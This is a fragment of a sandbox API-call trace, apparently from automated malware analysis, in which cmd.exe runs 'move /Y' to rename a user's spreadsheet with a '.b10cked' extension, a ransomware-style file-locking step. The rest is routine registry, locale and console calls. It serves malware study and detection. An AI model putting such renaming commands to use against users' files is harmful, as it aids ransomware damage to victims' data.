(in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.717] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.717] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.717] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.717] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.717] GetEnvironmentStringsW () returned 0x3601d8* [0131.718] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0131.718] GetEnvironmentStringsW () returned 0x3601d8* [0131.718] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0131.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb4c | out: phkResult=0x26eb4c*=0x40) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegCloseKey (hKey=0x40) returned 0x0 [0131.718] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb4c | out: phkResult=0x26eb4c*=0x40) returned 0x0 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x40, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.718] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x1, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x0, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x4, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x4) returned 0x0 [0131.719] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb54, lpData=0x26eb58, lpcbData=0x26eb50*=0x1000 | out: lpType=0x26eb54*=0x0, lpData=0x26eb58*=0x9, lpcbData=0x26eb50*=0x1000) returned 0x2 [0131.719] RegCloseKey (hKey=0x40) returned 0x0 [0131.719] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.719] srand (_Seed=0x5b886366) [0131.719] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" [0131.719] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked\"" [0131.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.719] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.719] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.719] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.720] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.720] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.720] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.720] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.720] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.720] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.720] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.720] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.720] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.720] GetEnvironmentStringsW () returned 0x362328* [0131.720] FreeEnvironmentStringsW (penv=0x362328) returned 1 [0131.720] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.720] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.720] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.720] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.720] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.721] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.721] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f918 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f918, lpFilePart=0x26f914 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f914*="Desktop") returned 0x18 [0131.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.721] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.721] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.722] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0131.722] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.722] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.722] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.722] GetEnvironmentStringsW () returned 0x362b48* [0131.722] FreeEnvironmentStringsW (penv=0x362b48) returned 1 [0131.722] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.723] GetConsoleOutputCP () returned 0x1b5 [0131.723] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.723] GetUserDefaultLCID () returned 0x409 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa58, cchData=128 | out: lpLCData="0") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa58, cchData=128 | out: lpLCData="0") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa58, cchData=128 | out: lpLCData="1") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.724] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.725] GetConsoleTitleW (in: lpConsoleTitle=0x350918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.726] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.726] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.726] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.726] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.726] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.726] _wcsicmp (_String1="REM", _String2="move") returned 5 [0131.726] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.730] GetConsoleTitleW (in: lpConsoleTitle=0x26f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.730] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.730] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.730] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.730] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.730] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0131.730] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.730] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.730] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.730] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.731] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.731] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.731] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.731] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0131.731] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.731] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.731] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.731] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.731] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.731] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.732] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f50c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f504, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f504*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.734] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2=".") returned 7 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2="..") returned 7 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5ddjxd~1.xls")) returned 0x20 [0131.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.734] SetErrorMode (uMode=0x0) returned 0x0 [0131.734] SetErrorMode (uMode=0x1) returned 0x0 [0131.734] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", nBufferLength=0x104, lpBuffer=0x26ee94, lpFilePart=0x26ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", lpFilePart=0x26ee7c*="5DDJXD~1.XLS") returned 0x36 [0131.734] SetErrorMode (uMode=0x0) returned 0x1 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x10 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2=".") returned 7 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2="..") returned 7 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5ddjxd~1.xls")) returned 0x20 [0131.735] SetErrorMode (uMode=0x0) returned 0x0 [0131.735] SetErrorMode (uMode=0x1) returned 0x0 [0131.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", nBufferLength=0x104, lpBuffer=0x26f310, lpFilePart=0x26f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", lpFilePart=0x26f0a8*="5DDJXD~1.XLS") returned 0x36 [0131.735] SetErrorMode (uMode=0x0) returned 0x1 [0131.735] SetErrorMode (uMode=0x0) returned 0x0 [0131.735] SetErrorMode (uMode=0x1) returned 0x0 [0131.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", nBufferLength=0x104, lpBuffer=0x26f518, lpFilePart=0x26f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", lpFilePart=0x26f0a8*="5d djXdWwSLPL XJ.xls.b10cked") returned 0x46 [0131.735] SetErrorMode (uMode=0x0) returned 0x1 [0131.735] SetLastError (dwErrCode=0x0) [0131.735] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls.b10cked")) returned 0xffffffff [0131.735] GetLastError () returned 0x2 [0131.735] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26ea24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea24) returned 0x350f50 [0131.910] FindNextFileW (in: hFindFile=0x350f50, lpFindFileData=0x26ea24 | out: lpFindFileData=0x26ea24) returned 0 [0131.911] GetLastError () returned 0x12 [0131.911] FindClose (in: hFindFile=0x350f50 | out: hFindFile=0x350f50) returned 1 [0131.912] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x361c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361c70) returned 0x350f50 [0131.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", nBufferLength=0x104, lpBuffer=0x26ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", lpFilePart=0x0) returned 0x46 [0131.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls", nBufferLength=0x104, lpBuffer=0x26ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls", lpFilePart=0x0) returned 0x3e [0131.912] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls")) returned 0x20 [0131.912] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls.b10cked"), dwFlags=0x3) returned 1 [0131.913] FindClose (in: hFindFile=0x350f50 | out: hFindFile=0x350f50) returned 1 [0131.913] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ec70 | out: _Buffer=" 1") returned 9 [0131.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.913] GetFileType (hFile=0x7) returned 0x2 [0131.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.913] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ebfc | out: lpMode=0x26ebfc) returned 1 [0131.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ec30 | out: lpConsoleScreenBufferInfo=0x26ec30) returned 1 [0131.913] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0131.914] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ec70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0131.914] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ec54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ec54*=0x1a) returned 1 [0131.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.914] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.914] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.914] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.915] 